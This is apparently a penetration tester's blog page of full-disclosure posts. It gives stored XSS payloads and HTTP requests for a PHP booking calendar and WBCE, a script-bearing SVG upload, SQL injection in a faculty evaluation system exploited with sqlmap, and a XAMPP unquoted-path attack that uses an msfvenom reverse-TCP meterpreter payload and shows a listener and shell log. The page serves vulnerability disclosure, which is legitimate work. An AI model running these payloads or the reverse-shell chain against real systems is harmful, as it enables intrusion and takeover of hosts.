Monday 31 July 2023

Introduction to Web Pentest - Paper ENG/BG

Hi,


Today I am going to show you a simple paper with techniques to new starters in the field Web Pentesting. The paper includes four main issues that are most common with web applications nowadays: CSRF, SQLi, XSS, Open Redirect.

Link to paper ENG (Google Drive):

Paper Link


Link to paper BULGARIAN(Google Drive):


Kind Regards,

Andrey Stoykov

at No comments:

Saturday 22 July 2023

Full Disclosure - Availability Booking Calendar PHP

Application

  • Availability Booking Calendar PHP


Information 

  • Input not validated 
  • Stored Cross Site Scripting flaw 
  • Unrestricted File Upload


Exploit 


XSS #1:

Steps to Reproduce:

1. Browse to Bookings
2. Select All Bookings
3. Edit booking and select Promo Code
4. Enter payload TEST"><script>alert(`XSS`)</script>


// HTTP POST request

POST /AvailabilityBookingCalendarPHP/index.php?controller=GzBooking&action=edit HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
[...]

[...]
edit_booking=1&calendars_price=900&extra_price=0&tax=10&deposit=91&promo_code=TEST%22%3E%3Cscript%3Ealert%28%60XSS%60%29%3C%2Fscript%3E&discount=0&total=910&create_booking=1
[...]

// HTTP response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 205
[...]



// HTTP GET request to Bookings page

GET /AvailabilityBookingCalendarPHP/index.php?controller=GzBooking&action=edit&id=2 HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
[...]


// HTTP response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 33590
[...]

[...]
<label class="control-label" for="promo_code">Promo code:</label>
            <input id="promo_code" class="form-control input-sm" type="text" name="promo_code" size="25" value=TEST"><script>alert(`XSS`)</script>" title="Promo code" placeholder="">
        </div>
[...]



Unrestricted File Upload #1:


// SVG file contents

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(`XSS`);
   </script>
</svg>


Steps to Reproduce:

1. Browse My Account
2. Image Browse -> Upload
3. Then right click on image
4. Select Open Image in New Tab


// HTTP POST request

POST /AvailabilityBookingCalendarPHP/index.php?controller=GzUser&action=edit&id=1 HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
[...]

[...]
-----------------------------13831219578609189241212424546
Content-Disposition: form-data; name="img"; filename="xss.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(`XSS`);
   </script>
</svg>
[...]


// HTTP response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 190
[...]

at No comments:

Sunday 16 July 2023

Награда в Hackerone - 250$ USD

Награда за първа грешка в уеб приложение.


Бих искал да благодаря на Hacker1 и Rockstargames за сътрудничеството, за да ми дадат награда от 250$ USD за неразкрита уязвимост, която открих.

Това се оказа първата ми награда за грешки в платформата Hacker1.


Много благодаря,

И много други предстоят :)

at No comments:

Friday 14 July 2023

Full Disclosure - WBCE 1.6.1

Application

  • WBCE v1.6.1 

Information 

  • Input not validated 
  • Stored Cross Site Scripting flaw 

Exploit 


Steps to Exploit: 

1. Login to application 
2. Browse to following URI "http://host/wbce/admin/pages/intro.php" 
3. Paste XSS payload "TEST"><img src=x onerror=alert(1)>
4. Then browse to settings Settings->General Settings->Enable Intro Page->Enabled
at No comments:

Full Disclosure - XAMPP Unquoted Path

Application

  • XAMPP v8.2.4


Information
  • Path not hardcoded into application


Exploit

Steps to Exploit:

1. Search for unquoted paths
2. Generate meterpreter shell
3. Copy shell to XAMPP directory replacing "mysql.exe"
4. Exploit by double clicking on shell


C:\Users\astoykov>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

mysql                                                                               mysql                                     C:\xampp\mysql\bin\mysqld.exe --defaults-file=c:\xampp\mysql\bin\my.ini mysql            Auto



// Generate shell
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.16 lport=4444 -f exe -o mysql.exe


// Setup listener
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set lhost 192.168.1.13
msf6 exploit(multi/handler) > set lport 4443
msf6 exploit(multi/handler) > set payload meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run


msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.1.13:4443
[*] Sending stage (175686 bytes) to 192.168.1.11
[*] Meterpreter session 1 opened (192.168.1.13:4443 -> 192.168.1.11:49686) at 2023-07-08 03:59:40 -0700


meterpreter > getuid
Server username: WIN-5PT4K404NLO\astoykov
meterpreter > getpid
Current pid: 4724
meterpreter > shell
Process 5884 created.
Channel 1 created.
Microsoft Windows [Version 10.0.20348.1]
(c) Microsoft Corporation. All rights reserved.
[...]
C:\xampp\mysql\bin>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 80B5-B405

 Directory of C:\xampp\mysql\bin
[...]

    at No comments:

    Friday 7 July 2023

    Full Disclosure - Faculty Evaluation System SQL Inject

      Application

    • Faculty Evaluation System v1.0

    Information

    • Input not validated
    • No input filtering
    • SQL inject flaw


    Exploit


    File: view_faculty.php


    Line #4


    // Add "id" parameter after "view_faculty" parameter then add equals "id" with integer

    [...]

    $qry = $conn->query("SELECT *,concat(firstname,' ',lastname) as name FROM faculty_list where id = ".$_GET['id'])->fetch_array();

    [...]


    Steps to Exploit:


    1. Login to application

    2. Browse to following URI "http://host/eval/index.php?page=view_faculty&id=1"

    3. Copy request to intercept proxy to file

    4. Exploit using SQLMap


    sqlmap -r test.txt  --threads 1 --dbms=mysql --fingerprint


    [...]

    [INFO] testing MySQL

    [INFO] confirming MySQL

    [INFO] the back-end DBMS is MySQL

    [INFO] actively fingerprinting MySQL

    [INFO] executing MySQL comment injection fingerprint

    back-end DBMS: active fingerprint: MySQL >= 5.7

                   comment injection fingerprint: MySQL 5.6.49

                   fork fingerprint: MariaDB

    [...]

      at No comments:
      Subscribe to: Posts (Atom)

      Friday Fun Pentest Series - 5 - spa-cartcmsv1.9.0.6

      Description - It was found that the application suffers from business logic flaw - Additionally the application is vulnerable to username en...